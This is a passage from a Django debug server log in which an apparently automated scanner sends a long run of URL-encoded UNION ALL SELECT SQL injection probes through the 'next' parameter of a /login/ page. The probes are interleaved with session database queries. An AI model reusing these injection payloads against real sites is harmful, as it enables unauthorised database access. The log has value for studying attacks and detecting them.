'2020-01-15T15:25:39.727531+00:00'::timestamptz); args=('mlvcz6anuhczfpdet0lwznjjqh3exkuj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 39, 727531, tzinfo=)) [01/Jan/2020 15:25:39] "GET /login/?next=-7905%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27TXwgxtIEoGYcBzLyWVjPQLKXvgBamTpNmzItsAOF%27%7C%7C%27qppzq%27%20FROM%20MSysAccessObjects--%20wSrT HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:39,946 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1nwytrgskhf14pmr99x545noycr5mfei' LIMIT 1; args=('1nwytrgskhf14pmr99x545noycr5mfei',) DEBUG 2020-01-01 15:25:39,949 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1nwytrgskhf14pmr99x545noycr5mfei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:39.947213+00:00'::timestamptz); args=('1nwytrgskhf14pmr99x545noycr5mfei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 39, 947213, tzinfo=)) [01/Jan/2020 15:25:39] "GET /login/?next=-8538%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27mbZaBlOHfnmcuTBRJMIoeDsfQaPmKoizVNyyPzLz%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20BfWu HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:40,086 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tzkqs9dq6ypkpf0kwdsvibo79pijymmj' LIMIT 1; args=('tzkqs9dq6ypkpf0kwdsvibo79pijymmj',) DEBUG 2020-01-01 15:25:40,087 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tzkqs9dq6ypkpf0kwdsvibo79pijymmj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:40.086633+00:00'::timestamptz); args=('tzkqs9dq6ypkpf0kwdsvibo79pijymmj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 40, 86633, tzinfo=)) [01/Jan/2020 15:25:40] "GET /login/?next=-7643%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27PJIrFqRysEYlBdxEhwdADRyshIeGisRYtYwCdHrg%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20Brst HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:40,242 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'eh68mqe7hmse6dlwzkgljheh7j9hjwrq' LIMIT 1; args=('eh68mqe7hmse6dlwzkgljheh7j9hjwrq',) DEBUG 2020-01-01 15:25:40,245 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('eh68mqe7hmse6dlwzkgljheh7j9hjwrq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:40.243161+00:00'::timestamptz); args=('eh68mqe7hmse6dlwzkgljheh7j9hjwrq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 40, 243161, tzinfo=)) [01/Jan/2020 15:25:40] "GET /login/?next=-2251%20UNION%20ALL%20SELECT%2062%2C62%2C%27qxvkq%27%7C%7C%27QVgzSZQwkaOKVyzvWnKQXxqGhawBYHCpPzjVlMAz%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20HCuN HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:40,405 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zl42tkf5aycewz7lckzxnydg0zo8l25u' LIMIT 1; args=('zl42tkf5aycewz7lckzxnydg0zo8l25u',) DEBUG 2020-01-01 15:25:40,408 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zl42tkf5aycewz7lckzxnydg0zo8l25u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:40.406806+00:00'::timestamptz); args=('zl42tkf5aycewz7lckzxnydg0zo8l25u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 40, 406806, tzinfo=)) [01/Jan/2020 15:25:40] "GET /login/?next=-2676%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27KcuxCDfxAqPAPyRTayhbnzdbokJkjJAbGQRLcUcy%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20uLKc HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:40,561 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'h2edity7bi5v3gztzi50rm8hz5chrhje' LIMIT 1; args=('h2edity7bi5v3gztzi50rm8hz5chrhje',) DEBUG 2020-01-01 15:25:40,563 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('h2edity7bi5v3gztzi50rm8hz5chrhje', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:40.562218+00:00'::timestamptz); args=('h2edity7bi5v3gztzi50rm8hz5chrhje', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 40, 562218, tzinfo=)) [01/Jan/2020 15:25:40] "GET /login/?next=-3331%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27WyTcOPFswfzOMragKRIAchDhqrNjqSEaILsjOmHD%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20FBWl HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:40,727 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'seqia4hch5ksdaivbcf444rsc3dmnud5' LIMIT 1; args=('seqia4hch5ksdaivbcf444rsc3dmnud5',) DEBUG 2020-01-01 15:25:40,729 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('seqia4hch5ksdaivbcf444rsc3dmnud5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:40.728243+00:00'::timestamptz); args=('seqia4hch5ksdaivbcf444rsc3dmnud5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 40, 728243, tzinfo=)) [01/Jan/2020 15:25:40] "GET /login/?next=-5304%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27jflpaBLmqsyqfntJiRGhjCEulSvjLbUHCWDEoviE%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20vkDE HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:40,873 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'xeff4vzq0at1zythm6so5y8gx737srdl' LIMIT 1; args=('xeff4vzq0at1zythm6so5y8gx737srdl',) DEBUG 2020-01-01 15:25:40,875 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('xeff4vzq0at1zythm6so5y8gx737srdl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:40.873828+00:00'::timestamptz); args=('xeff4vzq0at1zythm6so5y8gx737srdl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 40, 873828, tzinfo=)) [01/Jan/2020 15:25:40] "GET /login/?next=-5556%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27ZguFWQUuIeFfDqGLhMBkJNLkotWnScLsgpphOPct%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20dKlo HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:41,020 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8rdg2p2n3mttc2v6yviov1cs67i855hv' LIMIT 1; args=('8rdg2p2n3mttc2v6yviov1cs67i855hv',) DEBUG 2020-01-01 15:25:41,022 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8rdg2p2n3mttc2v6yviov1cs67i855hv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:41.021189+00:00'::timestamptz); args=('8rdg2p2n3mttc2v6yviov1cs67i855hv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 41, 21189, tzinfo=)) [01/Jan/2020 15:25:41] "GET /login/?next=-3565%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27dOoxmDLnTDJzSgQIFCPFYxLncLBmYnUdshrWXYyW%27%7C%7C%27qppzq%27%2C62%20FROM%20MSysAccessObjects--%20FGFg HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:41,157 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'oep4viz9tqvj3uo693l9m2mmzlmxgsna' LIMIT 1; args=('oep4viz9tqvj3uo693l9m2mmzlmxgsna',) DEBUG 2020-01-01 15:25:41,159 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('oep4viz9tqvj3uo693l9m2mmzlmxgsna', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:41.157785+00:00'::timestamptz); args=('oep4viz9tqvj3uo693l9m2mmzlmxgsna', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 41, 157785, tzinfo=)) [01/Jan/2020 15:25:41] "GET /login/?next=-7533%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27ZWNVaAnUhpIsrWDgyJyDHxbBfFTxVhBrpvlCfQqi%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20ixcf HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:41,300 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'monck7t8reghg9ohpc6dovc0v0lno091' LIMIT 1; args=('monck7t8reghg9ohpc6dovc0v0lno091',) DEBUG 2020-01-01 15:25:41,302 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('monck7t8reghg9ohpc6dovc0v0lno091', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:41.300586+00:00'::timestamptz); args=('monck7t8reghg9ohpc6dovc0v0lno091', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 41, 300586, tzinfo=)) [01/Jan/2020 15:25:41] "GET /login/?next=-9548%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27wuEMNiwDxq%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20WEdf HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:41,447 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2t1qxxb0l6qemr4tsqllv5p15tbu0lbn' LIMIT 1; args=('2t1qxxb0l6qemr4tsqllv5p15tbu0lbn',) DEBUG 2020-01-01 15:25:41,450 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2t1qxxb0l6qemr4tsqllv5p15tbu0lbn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:41.448160+00:00'::timestamptz); args=('2t1qxxb0l6qemr4tsqllv5p15tbu0lbn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 41, 448160, tzinfo=)) [01/Jan/2020 15:25:41] "GET /login/?next=-9724%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27MaZbWJZJVT%27%7C%7C%27qppzq%27%2C62%2C62%20FROM%20MSysAccessObjects--%20BUvy HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:41,612 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8iikhkw7puybznzecechblc9idqndujl' LIMIT 1; args=('8iikhkw7puybznzecechblc9idqndujl',) DEBUG 2020-01-01 15:25:41,615 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8iikhkw7puybznzecechblc9idqndujl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:41.613211+00:00'::timestamptz); args=('8iikhkw7puybznzecechblc9idqndujl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 41, 613211, tzinfo=)) [01/Jan/2020 15:25:41] "GET /login/?next=-1074%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27DQNApiUHVN%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20wEUb HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:41,766 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tt1bsfy8h1v73toh3nx9cmso698ag5e5' LIMIT 1; args=('tt1bsfy8h1v73toh3nx9cmso698ag5e5',) DEBUG 2020-01-01 15:25:41,768 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tt1bsfy8h1v73toh3nx9cmso698ag5e5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:41.767266+00:00'::timestamptz); args=('tt1bsfy8h1v73toh3nx9cmso698ag5e5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 41, 767266, tzinfo=)) [01/Jan/2020 15:25:41] "GET /login/?next=-7196%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C%27qxvkq%27%7C%7C%27wGcAevrfCz%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20ICQz HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:41,911 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zyfkc0y672efaj71ixmujg6rxl34k4j7' LIMIT 1; args=('zyfkc0y672efaj71ixmujg6rxl34k4j7',) DEBUG 2020-01-01 15:25:41,912 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zyfkc0y672efaj71ixmujg6rxl34k4j7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:41.911484+00:00'::timestamptz); args=('zyfkc0y672efaj71ixmujg6rxl34k4j7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 41, 911484, tzinfo=)) [01/Jan/2020 15:25:41] "GET /login/?next=-9115%20UNION%20ALL%20SELECT%2062%2C%27qxvkq%27%7C%7C%27hmJGcuspzE%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20EmPH HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:42,066 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7b6ngkgl7zz8nmd054wydrhgg7uxb22i' LIMIT 1; args=('7b6ngkgl7zz8nmd054wydrhgg7uxb22i',) DEBUG 2020-01-01 15:25:42,068 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7b6ngkgl7zz8nmd054wydrhgg7uxb22i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:42.066664+00:00'::timestamptz); args=('7b6ngkgl7zz8nmd054wydrhgg7uxb22i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 42, 66664, tzinfo=)) [01/Jan/2020 15:25:42] "GET /login/?next=-2056%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27fOllNWElxJ%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20QAXS HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:42,215 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '45esmnvh8j5uxk4gi85wxkht2zggp311' LIMIT 1; args=('45esmnvh8j5uxk4gi85wxkht2zggp311',) DEBUG 2020-01-01 15:25:42,218 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('45esmnvh8j5uxk4gi85wxkht2zggp311', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:42.216169+00:00'::timestamptz); args=('45esmnvh8j5uxk4gi85wxkht2zggp311', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 42, 216169, tzinfo=)) [01/Jan/2020 15:25:42] "GET /login/?next=-8353%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27cWWPnPcBIc%27%7C%7C%27qppzq%27%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20jcol HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:42,357 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gxcuzdr1vfl77r339x1pv3emf91emmt9' LIMIT 1; args=('gxcuzdr1vfl77r339x1pv3emf91emmt9',) DEBUG 2020-01-01 15:25:42,359 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gxcuzdr1vfl77r339x1pv3emf91emmt9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:42.357739+00:00'::timestamptz); args=('gxcuzdr1vfl77r339x1pv3emf91emmt9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 42, 357739, tzinfo=)) [01/Jan/2020 15:25:42] "GET /login/?next=-6404%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27QYlQVsFkDE%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20YjMB HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:42,518 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bwr3bmk1v8m2bg0gdqrzm9g57jkv4gx2' LIMIT 1; args=('bwr3bmk1v8m2bg0gdqrzm9g57jkv4gx2',) DEBUG 2020-01-01 15:25:42,521 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bwr3bmk1v8m2bg0gdqrzm9g57jkv4gx2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:42.519135+00:00'::timestamptz); args=('bwr3bmk1v8m2bg0gdqrzm9g57jkv4gx2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 42, 519135, tzinfo=)) [01/Jan/2020 15:25:42] "GET /login/?next=-2671%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27khSnPRnUIq%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20QCxG HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:42,696 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bfnvtos1ctwafm7qrmtizzelg74qqytn' LIMIT 1; args=('bfnvtos1ctwafm7qrmtizzelg74qqytn',) DEBUG 2020-01-01 15:25:42,699 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bfnvtos1ctwafm7qrmtizzelg74qqytn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:42.697471+00:00'::timestamptz); args=('bfnvtos1ctwafm7qrmtizzelg74qqytn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 42, 697471, tzinfo=)) [01/Jan/2020 15:25:42] "GET /login/?next=-4600%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27mThOPprcWT%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20cYVq HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:42,857 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'w50hu51s1ofm3d5mvgp815d1t5ji8y9u' LIMIT 1; args=('w50hu51s1ofm3d5mvgp815d1t5ji8y9u',) DEBUG 2020-01-01 15:25:42,859 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('w50hu51s1ofm3d5mvgp815d1t5ji8y9u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:42.857969+00:00'::timestamptz); args=('w50hu51s1ofm3d5mvgp815d1t5ji8y9u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 42, 857969, tzinfo=)) [01/Jan/2020 15:25:42] "GET /login/?next=-4834%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27YbiAWmTpSX%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20ksoN HTTP/1.0" 200 2192 DEBUG 2020-01-01 15:25:43,031 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2gcmif627yn5dgshh1nf0w0xlke2gr5x' LIMIT 1; args=('2gcmif627yn5dgshh1nf0w0xlke2gr5x',) DEBUG 2020-01-01 15:25:43,034 utils 2749 140297233225472 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES 